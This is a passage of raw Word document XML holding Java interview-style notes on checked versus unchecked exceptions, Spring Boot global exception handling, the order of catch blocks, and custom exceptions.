          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E8C3C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at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E99E2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time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7164919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9E31CB" w:rsidRPr="00CE4B95" w14:paraId="0C4FC8B4" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF9D099"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st Handle/Declare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CC437E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must use try-catch or declare with throws</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EA0725B"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 not mandatory to handle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="44091082" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BD36B58"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resents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C9F3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problems (I/O, DB, file not found, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66902C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gramming errors (null access, logic issues, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="6DA1D05C" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ACB206C"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4DA796DE"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 ParseException</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31538F0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 ArrayIndexOutOfBoundsException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E31CB" w:rsidRPr="00CE4B95" w14:paraId="0F07DF55" w14:textId="77777777" w:rsidTr="00027EEE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C33FB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xception Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246F8D9F"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Exception (not RuntimeException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6698CD4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RuntimeException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C0F7EBF"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9A5DC">
          <v:rect id="_x0000_i1617" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E281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Exception – Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D42DB4"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readFile() throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EA333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70BAF9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24E07" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>must be handled</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or compiler will show an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA853C3"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C9B93">
          <v:rect id="_x0000_i1618" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA224EC"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Exception – Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F5DB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divide(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AB8C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 / b); // Might throw ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F83D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B15E8B" w14:textId="77777777" w:rsidR="00027EEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00027EEE" w:rsidP="009E31CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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don’t need to handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> this. It’s the programmer’s responsibility to prevent such logic issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A84BE02"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92825">
          <v:rect id="_x0000_i1619" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A1F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15157EFC"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for scenarios </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>out of your control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (file, network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B534DA"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ogic errors or illegal arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A44BA" w14:textId="346E60AD"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D171599" w14:textId="77777777" w:rsidR="002D6AFA" w:rsidRPr="00CE4B95" w:rsidRDefault="002D6AFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Toc197867429"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle unchecked exceptions?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="0FC3470B" w14:textId="29592ADC" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775A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i.e., RuntimeException and its subclasses) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not mandatory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>still can and should handle them</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure your application is robust and doesn’t crash unexpectedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189188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64630">
          <v:rect id="_x0000_i1621" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="137FFC32"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Are Unchecked Exceptions?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAC043"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ccur due to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>programming mistakes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEA9B9"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64B200D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1BD606E7"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7CD38F8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5B351B8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not checked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at compile-time, but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F6F12B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8F58E8">
          <v:rect id="_x0000_i1622" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032EDC0B"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Unchecked Exceptions?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC3D61"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4B8B9299"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4483D8B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11CC15D"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732D61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is will throw ArithmeticException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144B166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1FA656A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4B577FE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30AC6"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5134C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63ABC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2A255">
          <v:rect id="_x0000_i1623" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C31066"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a Global Exception Handler (Spring Boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58D79E"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real-time apps (like Spring Boot), use @ControllerAdvice and @ExceptionHandler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A54BBF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Advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBAC3A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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF9802" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A7581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Handler(NullPointerException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC7D78"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ResponseEntity&lt;String&gt; handleNPE(NullPointerException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596472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ResponseEntity&lt;&gt;("Null value found: " + ex.getMessage(), HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11336AF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C8057"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F4834B"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A8001">
          <v:rect id="_x0000_i1624" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D8720"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1596E9"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n't overuse try-catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – only where you can recover or log meaningfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B6301"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 inputs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid unchecked exceptions in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E21E8AA" w14:textId="77777777" w:rsidR="008E2C57" w:rsidRPr="00CE4B95" w:rsidRDefault="008E2C57" w:rsidP="00775ADB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92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logging frameworks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to capture exceptions for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F820F" w14:textId="15E7A043"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25" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9BD8A" w14:textId="77777777" w:rsidR="009A06ED" w:rsidRPr="00CE4B95" w:rsidRDefault="009A06ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_Toc197867430"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen if I use Exception and custom exceptions together? Priority?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w14:paraId="7D73CB96" w14:textId="61C7ED8D" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B6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have a catch(Exception e) block and also specific catch blocks for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e order matters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E562AB5"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F59453E">
          <v:rect id="_x0000_i1626" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB14D4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checks catch blocks top-down, and the first matching catch block gets executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE695E"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 priority is given to the first matching type, NOT the most specific by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D2D6A"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22BD9">
          <v:rect id="_x0000_i1627" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4157F"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54988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ustomException extends Exception {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FD889" w14:textId="77777777" w:rsidR="006712E3" w:rsidRPr="00CE4B95" w:rsidRDefault="006712E3" w:rsidP="006D1B65">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F2CE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F23A1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AB9A3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547EE3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138BBE8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31A14F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4AA43215"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1822395B"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tch (MyCustomException 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if placed after Exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF16D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ystem.out.println("Caught MyCustomException");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C64EA"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0858360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1CABC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F64B2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ile-Time Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE05E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reachable catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for MyCustomException. It is already handled by the catch block for Exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0325A752"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18F2E2">
          <v:rect id="_x0000_i1628" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5690A8F0"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rect Order (Specific to General):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADE93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58D8AE4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0BA2EF0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MyCustomException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B998F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MyCustomException");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execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E345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0A9BBE90"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13EA479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C87ACB"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2A93C7">
          <v:rect id="_x0000_i1629" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B6D8D"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iority Rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A468FB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specific exceptions must be caught before general exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100442FD"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424A9">
          <v:rect id="_x0000_i1630" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A9FC8"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3752"/>
      </w:tblGrid>
      <w:tr w:rsidR="006D1B65" w:rsidRPr="00CE4B95" w14:paraId="41239F52" w14:textId="77777777" w:rsidTr="006712E3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77207426"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dition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3314D45C"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6D1B65" w:rsidRPr="00CE4B95" w14:paraId="192BA26B" w14:textId="77777777" w:rsidTr="006712E3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EA3D4B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Exception e) before custom exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E247F1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unreachable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D1B65" w:rsidRPr="00CE4B95" w14:paraId="536C3D6A" w14:textId="77777777" w:rsidTr="006712E3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A02A44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CustomException e) before Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12654DF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rrect (custom block gets executed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C337B2F" w14:textId="69B0B1F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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB8DB11" w14:textId="77777777" w:rsidR="00AB25FA" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB25FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc197867431"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you created a custom exception? What is the purpose of that?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w14:paraId="1E515B6D" w14:textId="6E4703CA" w:rsidR="0047397F" w:rsidRPr="00CE4B95" w:rsidRDefault="0047397F"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s a Java developer, creating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best practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in many real-world scenarios to make error handling more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meaningfu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usable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D1B5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24A029">
          <v:rect id="_x0000_i1632" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FDCE3"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a Custom Exception?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49ADFB"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ustom Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a user-defined class that extends Exception or RuntimeException to represent </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application-specific error scenarios</w:t>
      </w:r>
